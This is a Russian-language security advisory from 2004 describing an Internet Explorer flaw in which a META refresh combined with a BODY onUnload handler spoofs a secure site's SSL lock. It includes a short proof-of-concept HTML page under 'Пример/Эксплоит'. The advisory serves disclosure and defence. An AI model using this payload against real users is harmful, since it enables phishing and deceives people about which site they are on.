Имитация безопасного Web сайта в Microsoft Internet Explorer

Дата публикации:
02.05.2004
Всего просмотров:
1270
Опасность:
Средняя
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: Microsoft Internet Explorer

Описание: Уязвимость обнаружена в Microsoft Internet Explorer. Удаленный пользователь может использовать сертификат другого сайта, чтобы заставить браузер целевого пользователя считать, что он подключен к другому сайтк.

Удаленный пользователь может использовать комбинацию META Refresh оператора и OnUnload BODY тэга, чтобы частично имитировать безопасный Web сайт.

Удаленный пользователь может создать HMTL, который выполнить нулевое второе обновление к целевому безопасному Web сайту. HTML также включает BODY onUnload операцию, используя метод window.location:

< BODY onUnload='window.location=""' >
В результате браузер запросит целевого пользователя доверить сертификату целевого безопасного сайта и затем, если целевой пользователь ответил положительно, отобразить содержание безопасного сайта. URL отобразит URL злонамеренного Web сайта, однако, содержание будет содержанием целевого вебсайта и SSL lock отобразится в браузере целевого пользователя. Если целевой пользователь кликнет на иконку SSL lock, браузер сообщит что сертификат страницы не действителен.

Пример/Эксплоит:

< html>
< head>
< title>Your Page Title</title>
< meta http-equiv="REFRESH" 
  content="0;url=https://www.example.com/">

< META HTTP-EQUIV="Content-Type" CONTENT="text/html;"> 

< /HEAD>
< BODY onUnload='window.location=""'>

< /BODY>
< /HTML>

URL производителя: http://www.microsoft.com/technet/security/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: IE Certificate Stealing (Phising) bug